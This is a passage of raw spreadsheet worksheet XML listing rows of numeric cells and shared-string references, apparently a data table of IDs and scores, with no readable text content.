      <c r="C20904" s="2" t="s">
        <v>20173</v>
      </c>
      <c r="D20904" s="2">
        <v>1.0</v>
      </c>
      <c r="E20904" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20904" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20905" ht="15.75" customHeight="1">
      <c r="A20905" s="1">
        <v>15273.0</v>
      </c>
      <c r="B20905" s="2">
        <v>4.2367104E7</v>
      </c>
      <c r="C20905" s="2" t="s">
        <v>20174</v>
      </c>
      <c r="D20905" s="2">
        <v>1.0</v>
      </c>
      <c r="E20905" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20905" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20906" ht="15.75" customHeight="1">
      <c r="A20906" s="1">
        <v>15436.0</v>
      </c>
      <c r="B20906" s="2">
        <v>4.2981342E7</v>
      </c>
      <c r="C20906" s="2" t="s">
        <v>20175</v>
      </c>
      <c r="D20906" s="2">
        <v>1.0</v>
      </c>
      <c r="E20906" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20906" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20907" ht="15.75" customHeight="1">
      <c r="A20907" s="1">
        <v>15669.0</v>
      </c>
      <c r="B20907" s="2">
        <v>4.3739017E7</v>
      </c>
      <c r="C20907" s="2" t="s">
        <v>20176</v>
      </c>
      <c r="D20907" s="2">
        <v>1.0</v>
      </c>
      <c r="E20907" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20907" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20908" ht="15.75" customHeight="1">
      <c r="A20908" s="1">
        <v>15869.0</v>
      </c>
      <c r="B20908" s="2">
        <v>4.4501107E7</v>
      </c>
      <c r="C20908" s="2" t="s">
        <v>20177</v>
      </c>
      <c r="D20908" s="2">
        <v>1.0</v>
      </c>
      <c r="E20908" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20908" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20909" ht="15.75" customHeight="1">
      <c r="A20909" s="1">
        <v>16310.0</v>
      </c>
      <c r="B20909" s="2">
        <v>4.5942494E7</v>
      </c>
      <c r="C20909" s="2" t="s">
        <v>20178</v>
      </c>
      <c r="D20909" s="2">
        <v>1.0</v>
      </c>
      <c r="E20909" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20909" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20910" ht="15.75" customHeight="1">
      <c r="A20910" s="1">
        <v>16395.0</v>
      </c>
      <c r="B20910" s="2">
        <v>4.6284595E7</v>
      </c>
      <c r="C20910" s="2" t="s">
        <v>20007</v>
      </c>
      <c r="D20910" s="2">
        <v>1.0</v>
      </c>
      <c r="E20910" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20910" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20911" ht="15.75" customHeight="1">
      <c r="A20911" s="1">
        <v>16418.0</v>
      </c>
      <c r="B20911" s="2">
        <v>4.6307112E7</v>
      </c>
      <c r="C20911" s="2" t="s">
        <v>20179</v>
      </c>
      <c r="D20911" s="2">
        <v>1.0</v>
      </c>
      <c r="E20911" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20911" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20912" ht="15.75" customHeight="1">
      <c r="A20912" s="1">
        <v>16549.0</v>
      </c>
      <c r="B20912" s="2">
        <v>4.6807992E7</v>
      </c>
      <c r="C20912" s="2" t="s">
        <v>20180</v>
      </c>
      <c r="D20912" s="2">
        <v>1.0</v>
      </c>
      <c r="E20912" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20912" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20913" ht="15.75" customHeight="1">
      <c r="A20913" s="1">
        <v>16933.0</v>
      </c>
      <c r="B20913" s="2">
        <v>4.8174819E7</v>
      </c>
      <c r="C20913" s="2" t="s">
        <v>20181</v>
      </c>
      <c r="D20913" s="2">
        <v>1.0</v>
      </c>
      <c r="E20913" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20913" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20914" ht="15.75" customHeight="1">
      <c r="A20914" s="1">
        <v>16945.0</v>
      </c>
      <c r="B20914" s="2">
        <v>4.8216271E7</v>
      </c>
      <c r="C20914" s="2" t="s">
        <v>20182</v>
      </c>
      <c r="D20914" s="2">
        <v>1.0</v>
      </c>
      <c r="E20914" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20914" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20915" ht="15.75" customHeight="1">
      <c r="A20915" s="1">
        <v>17651.0</v>
      </c>
      <c r="B20915" s="2">
        <v>5.0419409E7</v>
      </c>
      <c r="C20915" s="2" t="s">
        <v>20183</v>
      </c>
      <c r="D20915" s="2">
        <v>1.0</v>
      </c>
      <c r="E20915" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20915" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20916" ht="15.75" customHeight="1">
      <c r="A20916" s="1">
        <v>17753.0</v>
      </c>
      <c r="B20916" s="2">
        <v>5.071022E7</v>
      </c>
      <c r="C20916" s="2" t="s">
        <v>20184</v>
      </c>
      <c r="D20916" s="2">
        <v>1.0</v>
      </c>
      <c r="E20916" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20916" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20917" ht="15.75" customHeight="1">
      <c r="A20917" s="1">
        <v>17900.0</v>
      </c>
      <c r="B20917" s="2">
        <v>5.1108539E7</v>
      </c>
      <c r="C20917" s="2" t="s">
        <v>20185</v>
      </c>
      <c r="D20917" s="2">
        <v>1.0</v>
      </c>
      <c r="E20917" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20917" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20918" ht="15.75" customHeight="1">
      <c r="A20918" s="1">
        <v>18177.0</v>
      </c>
      <c r="B20918" s="2">
        <v>5.1974208E7</v>
      </c>
      <c r="C20918" s="2" t="s">
        <v>20186</v>
      </c>
      <c r="D20918" s="2">
        <v>1.0</v>
      </c>
      <c r="E20918" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20918" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20919" ht="15.75" customHeight="1">
      <c r="A20919" s="1">
        <v>18241.0</v>
      </c>
      <c r="B20919" s="2">
        <v>5.2142264E7</v>
      </c>
      <c r="C20919" s="2" t="s">
        <v>20187</v>
      </c>
      <c r="D20919" s="2">
        <v>1.0</v>
      </c>
      <c r="E20919" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20919" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20920" ht="15.75" customHeight="1">
      <c r="A20920" s="1">
        <v>18366.0</v>
      </c>
      <c r="B20920" s="2">
        <v>5256924.0</v>
      </c>
      <c r="C20920" s="2" t="s">
        <v>20188</v>
      </c>
      <c r="D20920" s="2">
        <v>1.0</v>
      </c>
      <c r="E20920" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20920" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20921" ht="15.75" customHeight="1">
      <c r="A20921" s="1">
        <v>18839.0</v>
      </c>
      <c r="B20921" s="2">
        <v>5.396119E7</v>
      </c>
      <c r="C20921" s="2" t="s">
        <v>20189</v>
      </c>
      <c r="D20921" s="2">
        <v>1.0</v>
      </c>
      <c r="E20921" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20921" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20922" ht="15.75" customHeight="1">
      <c r="A20922" s="1">
        <v>19662.0</v>
      </c>
      <c r="B20922" s="2">
        <v>5.6366179E7</v>
      </c>
      <c r="C20922" s="2" t="s">
        <v>20190</v>
      </c>
      <c r="D20922" s="2">
        <v>1.0</v>
      </c>
      <c r="E20922" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20922" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20923" ht="15.75" customHeight="1">
      <c r="A20923" s="1">
        <v>19833.0</v>
      </c>
      <c r="B20923" s="2">
        <v>5.7051347E7</v>
      </c>
      <c r="C20923" s="2" t="s">
        <v>20191</v>
      </c>
      <c r="D20923" s="2">
        <v>1.0</v>
      </c>
      <c r="E20923" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20923" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20924" ht="15.75" customHeight="1">
      <c r="A20924" s="1">
        <v>20063.0</v>
      </c>
      <c r="B20924" s="2">
        <v>8489848.0</v>
      </c>
      <c r="C20924" s="2" t="s">
        <v>20192</v>
      </c>
      <c r="D20924" s="2">
        <v>1.0</v>
      </c>
      <c r="E20924" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20924" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20925" ht="15.75" customHeight="1">
      <c r="A20925" s="1">
        <v>20818.0</v>
      </c>
      <c r="B20925" s="2">
        <v>1.5373805E7</v>
      </c>
      <c r="C20925" s="2" t="s">
        <v>20193</v>
      </c>
      <c r="D20925" s="2">
        <v>1.0</v>
      </c>
      <c r="E20925" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20925" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20926" ht="15.75" customHeight="1">
      <c r="A20926" s="1">
        <v>21407.0</v>
      </c>
      <c r="B20926" s="2">
        <v>2.195536E7</v>
      </c>
      <c r="C20926" s="2" t="s">
        <v>20194</v>
      </c>
      <c r="D20926" s="2">
        <v>1.0</v>
      </c>
      <c r="E20926" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20926" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20927" ht="15.75" customHeight="1">
      <c r="A20927" s="1">
        <v>22924.0</v>
      </c>
      <c r="B20927" s="2">
        <v>4841333.0</v>
      </c>
      <c r="C20927" s="2" t="s">
        <v>20195</v>
      </c>
      <c r="D20927" s="2">
        <v>1.0</v>
      </c>
      <c r="E20927" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20927" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20928" ht="15.75" customHeight="1">
      <c r="A20928" s="1">
        <v>23410.0</v>
      </c>
      <c r="B20928" s="2">
        <v>5.5951062E7</v>
      </c>
      <c r="C20928" s="2" t="s">
        <v>20196</v>
      </c>
      <c r="D20928" s="2">
        <v>1.0</v>
      </c>
      <c r="E20928" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20928" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20929" ht="15.75" customHeight="1">
      <c r="A20929" s="1">
        <v>25029.0</v>
      </c>
      <c r="B20929" s="2">
        <v>1.2828729E7</v>
      </c>
      <c r="C20929" s="2" t="s">
        <v>20197</v>
      </c>
      <c r="D20929" s="2">
        <v>1.0</v>
      </c>
      <c r="E20929" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20929" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20930" ht="15.75" customHeight="1">
      <c r="A20930" s="1">
        <v>25221.0</v>
      </c>
      <c r="B20930" s="2">
        <v>1.3308406E7</v>
      </c>
      <c r="C20930" s="2" t="s">
        <v>20198</v>
      </c>
      <c r="D20930" s="2">
        <v>1.0</v>
      </c>
      <c r="E20930" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20930" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20931" ht="15.75" customHeight="1">
      <c r="A20931" s="1">
        <v>25448.0</v>
      </c>
      <c r="B20931" s="2">
        <v>1.3931753E7</v>
      </c>
      <c r="C20931" s="2" t="s">
        <v>20199</v>
      </c>
      <c r="D20931" s="2">
        <v>1.0</v>
      </c>
      <c r="E20931" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20931" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20932" ht="15.75" customHeight="1">
      <c r="A20932" s="1">
        <v>26446.0</v>
      </c>
      <c r="B20932" s="2">
        <v>1.7279983E7</v>
      </c>
      <c r="C20932" s="2" t="s">
        <v>20200</v>
      </c>
      <c r="D20932" s="2">
        <v>1.0</v>
      </c>
      <c r="E20932" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20932" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20933" ht="15.75" customHeight="1">
      <c r="A20933" s="1">
        <v>26991.0</v>
      </c>
      <c r="B20933" s="2">
        <v>1.9790713E7</v>
      </c>
      <c r="C20933" s="2" t="s">
        <v>20201</v>
      </c>
      <c r="D20933" s="2">
        <v>1.0</v>
      </c>
      <c r="E20933" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20933" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20934" ht="15.75" customHeight="1">
      <c r="A20934" s="1">
        <v>27438.0</v>
      </c>
      <c r="B20934" s="2">
        <v>2.1955359E7</v>
      </c>
      <c r="C20934" s="2" t="s">
        <v>20194</v>
      </c>
      <c r="D20934" s="2">
        <v>1.0</v>
      </c>
      <c r="E20934" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20934" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20935" ht="15.75" customHeight="1">
      <c r="A20935" s="1">
        <v>27631.0</v>
      </c>
      <c r="B20935" s="2">
        <v>2.2730108E7</v>
      </c>
      <c r="C20935" s="2" t="s">
        <v>20202</v>
      </c>
      <c r="D20935" s="2">
        <v>1.0</v>
      </c>
      <c r="E20935" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20935" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20936" ht="15.75" customHeight="1">
      <c r="A20936" s="1">
        <v>27891.0</v>
      </c>
      <c r="B20936" s="2">
        <v>2.3609952E7</v>
      </c>
      <c r="C20936" s="2" t="s">
        <v>20203</v>
      </c>
      <c r="D20936" s="2">
        <v>1.0</v>
      </c>
      <c r="E20936" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20936" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20937" ht="15.75" customHeight="1">
      <c r="A20937" s="1">
        <v>28141.0</v>
      </c>
      <c r="B20937" s="2">
        <v>2.479852E7</v>
      </c>
      <c r="C20937" s="2" t="s">
        <v>20204</v>
      </c>
      <c r="D20937" s="2">
        <v>1.0</v>
      </c>
      <c r="E20937" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20937" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20938" ht="15.75" customHeight="1">
      <c r="A20938" s="1">
        <v>29344.0</v>
      </c>
      <c r="B20938" s="2">
        <v>3.1424024E7</v>
      </c>
      <c r="C20938" s="2" t="s">
        <v>20205</v>
      </c>
      <c r="D20938" s="2">
        <v>1.0</v>
      </c>
      <c r="E20938" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20938" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20939" ht="15.75" customHeight="1">
      <c r="A20939" s="1">
        <v>29978.0</v>
      </c>
      <c r="B20939" s="2">
        <v>3610293.0</v>
      </c>
      <c r="C20939" s="2" t="s">
        <v>20206</v>
      </c>
      <c r="D20939" s="2">
        <v>1.0</v>
      </c>
      <c r="E20939" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20939" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20940" ht="15.75" customHeight="1">
      <c r="A20940" s="1">
        <v>30625.0</v>
      </c>
      <c r="B20940" s="2">
        <v>4.1359793E7</v>
      </c>
      <c r="C20940" s="2" t="s">
        <v>20207</v>
      </c>
      <c r="D20940" s="2">
        <v>1.0</v>
      </c>
      <c r="E20940" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20940" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20941" ht="15.75" customHeight="1">
      <c r="A20941" s="1">
        <v>30737.0</v>
      </c>
      <c r="B20941" s="2">
        <v>4.4029816E7</v>
      </c>
      <c r="C20941" s="2" t="s">
        <v>20208</v>
      </c>
      <c r="D20941" s="2">
        <v>1.0</v>
      </c>
      <c r="E20941" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20941" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20942" ht="15.75" customHeight="1">
      <c r="A20942" s="1">
        <v>32193.0</v>
      </c>
      <c r="B20942" s="2">
        <v>5.4746733E7</v>
      </c>
      <c r="C20942" s="2" t="s">
        <v>20209</v>
      </c>
      <c r="D20942" s="2">
        <v>1.0</v>
      </c>
      <c r="E20942" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20942" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20943" ht="15.75" customHeight="1">
      <c r="A20943" s="1">
        <v>32289.0</v>
      </c>
      <c r="B20943" s="2">
        <v>5546227.0</v>
      </c>
      <c r="C20943" s="2" t="s">
        <v>20210</v>
      </c>
      <c r="D20943" s="2">
        <v>1.0</v>
      </c>
      <c r="E20943" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20943" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20944" ht="15.75" customHeight="1">
      <c r="A20944" s="1">
        <v>33802.0</v>
      </c>
      <c r="B20944" s="2">
        <v>8830684.0</v>
      </c>
      <c r="C20944" s="2" t="s">
        <v>20211</v>
      </c>
      <c r="D20944" s="2">
        <v>1.0</v>
      </c>
      <c r="E20944" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20944" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20945" ht="15.75" customHeight="1">
      <c r="A20945" s="1">
        <v>34186.0</v>
      </c>
      <c r="B20945" s="2">
        <v>9956979.0</v>
      </c>
      <c r="C20945" s="2" t="s">
        <v>20212</v>
      </c>
      <c r="D20945" s="2">
        <v>1.0</v>
      </c>
      <c r="E20945" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20945" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20946" ht="15.75" customHeight="1">
      <c r="A20946" s="1">
        <v>34264.0</v>
      </c>
      <c r="B20946" s="2">
        <v>8051161.0</v>
      </c>
      <c r="C20946" s="2" t="s">
        <v>20213</v>
      </c>
      <c r="D20946" s="2">
        <v>1.0</v>
      </c>
      <c r="E20946" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20946" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="20947" ht="15.75" customHeight="1">
      <c r="A20947" s="1">
        <v>4038.0</v>
      </c>
      <c r="B20947" s="2">
        <v>4.1039924E7</v>
      </c>
      <c r="C20947" s="2" t="s">
        <v>20214</v>
      </c>
      <c r="D20947" s="2">
        <v>1.0</v>
      </c>
      <c r="E20947" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20947" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="20948" ht="15.75" customHeight="1">
      <c r="A20948" s="1">
        <v>5576.0</v>
      </c>
      <c r="B20948" s="2">
        <v>4.6044932E7</v>
      </c>
      <c r="C20948" s="2" t="s">
        <v>20215</v>
      </c>
      <c r="D20948" s="2">
        <v>1.0</v>
      </c>
      <c r="E20948" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20948" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="20949" ht="15.75" customHeight="1">
      <c r="A20949" s="1">
        <v>6226.0</v>
      </c>
      <c r="B20949" s="2">
        <v>4.80297E7</v>
      </c>
      <c r="C20949" s="2" t="s">
        <v>20216</v>
      </c>
      <c r="D20949" s="2">
        <v>1.0</v>
      </c>
      <c r="E20949" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20949" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="20950" ht="15.75" customHeight="1">
      <c r="A20950" s="1">
        <v>6367.0</v>
      </c>
      <c r="B20950" s="2">
        <v>4.8376597E7</v>
      </c>
      <c r="C20950" s="2" t="s">
        <v>20217</v>
      </c>
      <c r="D20950" s="2">
        <v>1.0</v>
      </c>
      <c r="E20950" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20950" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="20951" ht="15.75" customHeight="1">
      <c r="A20951" s="1">
        <v>9246.0</v>
      </c>
      <c r="B20951" s="2">
        <v>5.5471436E7</v>
      </c>
      <c r="C20951" s="2" t="s">
        <v>20218</v>
      </c>
      <c r="D20951" s="2">
        <v>1.0</v>
      </c>
      <c r="E20951" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20951" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="20952" ht="15.75" customHeight="1">
      <c r="A20952" s="1">
        <v>9922.0</v>
      </c>
      <c r="B20952" s="2">
        <v>5.6818173E7</v>
      </c>
      <c r="C20952" s="2" t="s">
        <v>20219</v>
      </c>
      <c r="D20952" s="2">
        <v>1.0</v>
      </c>
      <c r="E20952" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20952" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="20953" ht="15.75" customHeight="1">
      <c r="A20953" s="1">
        <v>14439.0</v>
      </c>
      <c r="B20953" s="2">
        <v>3.930043E7</v>
      </c>
      <c r="C20953" s="2" t="s">
        <v>20220</v>
      </c>
      <c r="D20953" s="2">
        <v>1.0</v>
      </c>
      <c r="E20953" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20953" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="20954" ht="15.75" customHeight="1">
      <c r="A20954" s="1">
        <v>5470.0</v>
      </c>
      <c r="B20954" s="2">
        <v>4.570848E7</v>
      </c>
      <c r="C20954" s="2" t="s">
        <v>20221</v>
      </c>
      <c r="D20954" s="2">
        <v>1.0</v>
      </c>
      <c r="E20954" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20954" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="20955" ht="15.75" customHeight="1">
      <c r="A20955" s="1">
        <v>7458.0</v>
      </c>
      <c r="B20955" s="2">
        <v>5.1237956E7</v>
      </c>
      <c r="C20955" s="2" t="s">
        <v>20222</v>
      </c>
      <c r="D20955" s="2">
        <v>1.0</v>
      </c>
      <c r="E20955" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20955" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="20956" ht="15.75" customHeight="1">
      <c r="A20956" s="1">
        <v>15477.0</v>
      </c>
      <c r="B20956" s="2">
        <v>4.3150553E7</v>
      </c>
      <c r="C20956" s="2" t="s">
        <v>20223</v>
      </c>
      <c r="D20956" s="2">
        <v>1.0</v>
      </c>
      <c r="E20956" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20956" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="20957" ht="15.75" customHeight="1">
      <c r="A20957" s="1">
        <v>30518.0</v>
      </c>
      <c r="B20957" s="2">
        <v>4.0152019E7</v>
      </c>
      <c r="C20957" s="2" t="s">
        <v>20224</v>
      </c>
      <c r="D20957" s="2">
        <v>1.0</v>
      </c>
      <c r="E20957" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20957" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="20958" ht="15.75" customHeight="1">
      <c r="A20958" s="1">
        <v>2803.0</v>
      </c>
      <c r="B20958" s="2">
        <v>3.534645E7</v>
      </c>
      <c r="C20958" s="2" t="s">
        <v>20225</v>
      </c>
      <c r="D20958" s="2">
        <v>1.0</v>
      </c>
      <c r="E20958" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20958" s="2">
        <v>0.1120689655172414</v>
      </c>
    </row>
    <row r="20959" ht="15.75" customHeight="1">
      <c r="A20959" s="1">
        <v>5124.0</v>
      </c>
      <c r="B20959" s="2">
        <v>4.4577224E7</v>
      </c>
      <c r="C20959" s="2" t="s">
        <v>20226</v>
      </c>
      <c r="D20959" s="2">
        <v>1.0</v>
      </c>
      <c r="E20959" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20959" s="2">
        <v>0.1120689655172414</v>
      </c>
    </row>
    <row r="20960" ht="15.75" customHeight="1">
      <c r="A20960" s="1">
        <v>10874.0</v>
      </c>
      <c r="B20960" s="2">
        <v>1.6471201E7</v>
      </c>
      <c r="C20960" s="2" t="s">
        <v>20227</v>
      </c>
      <c r="D20960" s="2">
        <v>1.0</v>
      </c>
      <c r="E20960" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20960" s="2">
        <v>0.1120689655172414</v>
      </c>
    </row>
    <row r="20961" ht="15.75" customHeight="1">
      <c r="A20961" s="1">
        <v>17154.0</v>
      </c>
      <c r="B20961" s="2">
        <v>4.8856472E7</v>
      </c>
      <c r="C20961" s="2" t="s">
        <v>20228</v>
      </c>
      <c r="D20961" s="2">
        <v>1.0</v>
      </c>
      <c r="E20961" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20961" s="2">
        <v>0.1120689655172414</v>
      </c>
    </row>
    <row r="20962" ht="15.75" customHeight="1">
      <c r="A20962" s="1">
        <v>20021.0</v>
      </c>
      <c r="B20962" s="2">
        <v>6142588.0</v>
      </c>
      <c r="C20962" s="2" t="s">
        <v>20229</v>
      </c>
      <c r="D20962" s="2">
        <v>1.0</v>
      </c>
      <c r="E20962" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20962" s="2">
        <v>0.1120689655172414</v>
      </c>
    </row>
    <row r="20963" ht="15.75" customHeight="1">
      <c r="A20963" s="1">
        <v>14174.0</v>
      </c>
      <c r="B20963" s="2">
        <v>3.8067388E7</v>
      </c>
      <c r="C20963" s="2" t="s">
        <v>20230</v>
      </c>
      <c r="D20963" s="2">
        <v>1.0</v>
      </c>
      <c r="E20963" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20963" s="2">
        <v>0.1120689655172413</v>
      </c>
    </row>
    <row r="20964" ht="15.75" customHeight="1">
      <c r="A20964" s="1">
        <v>1021.0</v>
      </c>
      <c r="B20964" s="2">
        <v>2.31655E7</v>
      </c>
      <c r="C20964" s="2" t="s">
        <v>20231</v>
      </c>
      <c r="D20964" s="2">
        <v>1.0</v>
      </c>
      <c r="E20964" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20964" s="2">
        <v>0.1120527306967985</v>
      </c>
    </row>
    <row r="20965" ht="15.75" customHeight="1">
      <c r="A20965" s="1">
        <v>3002.0</v>
      </c>
      <c r="B20965" s="2">
        <v>3.6314292E7</v>
      </c>
      <c r="C20965" s="2" t="s">
        <v>20232</v>
      </c>
      <c r="D20965" s="2">
        <v>1.0</v>
      </c>
      <c r="E20965" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20965" s="2">
        <v>0.1120527306967985</v>
      </c>
    </row>
    <row r="20966" ht="15.75" customHeight="1">
      <c r="A20966" s="1">
        <v>7345.0</v>
      </c>
      <c r="B20966" s="2">
        <v>5.0979342E7</v>
      </c>
      <c r="C20966" s="2" t="s">
        <v>20233</v>
      </c>
      <c r="D20966" s="2">
        <v>1.0</v>
      </c>
      <c r="E20966" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20966" s="2">
        <v>0.1120527306967985</v>
      </c>
    </row>
    <row r="20967" ht="15.75" customHeight="1">
      <c r="A20967" s="1">
        <v>27504.0</v>
      </c>
      <c r="B20967" s="2">
        <v>2.2101073E7</v>
      </c>
      <c r="C20967" s="2" t="s">
        <v>20234</v>
      </c>
      <c r="D20967" s="2">
        <v>1.0</v>
      </c>
      <c r="E20967" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20967" s="2">
        <v>0.1120527306967985</v>
      </c>
    </row>
    <row r="20968" ht="15.75" customHeight="1">
      <c r="A20968" s="1">
        <v>1082.0</v>
      </c>
      <c r="B20968" s="2">
        <v>2.3678292E7</v>
      </c>
      <c r="C20968" s="2" t="s">
        <v>20235</v>
      </c>
      <c r="D20968" s="2">
        <v>1.0</v>
      </c>
      <c r="E20968" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20968" s="2">
        <v>0.112037037037037</v>
      </c>
    </row>
    <row r="20969" ht="15.75" customHeight="1">
      <c r="A20969" s="1">
        <v>3544.0</v>
      </c>
      <c r="B20969" s="2">
        <v>3.8713818E7</v>
      </c>
      <c r="C20969" s="2" t="s">
        <v>20236</v>
      </c>
      <c r="D20969" s="2">
        <v>1.0</v>
      </c>
      <c r="E20969" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20969" s="2">
        <v>0.112037037037037</v>
      </c>
    </row>
    <row r="20970" ht="15.75" customHeight="1">
      <c r="A20970" s="1">
        <v>5502.0</v>
      </c>
      <c r="B20970" s="2">
        <v>4.5814134E7</v>
      </c>
      <c r="C20970" s="2" t="s">
        <v>20237</v>
      </c>
      <c r="D20970" s="2">
        <v>1.0</v>
      </c>
      <c r="E20970" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20970" s="2">
        <v>0.112037037037037</v>
      </c>
    </row>
    <row r="20971" ht="15.75" customHeight="1">
      <c r="A20971" s="1">
        <v>9024.0</v>
      </c>
      <c r="B20971" s="2">
        <v>5.5019316E7</v>
      </c>
      <c r="C20971" s="2" t="s">
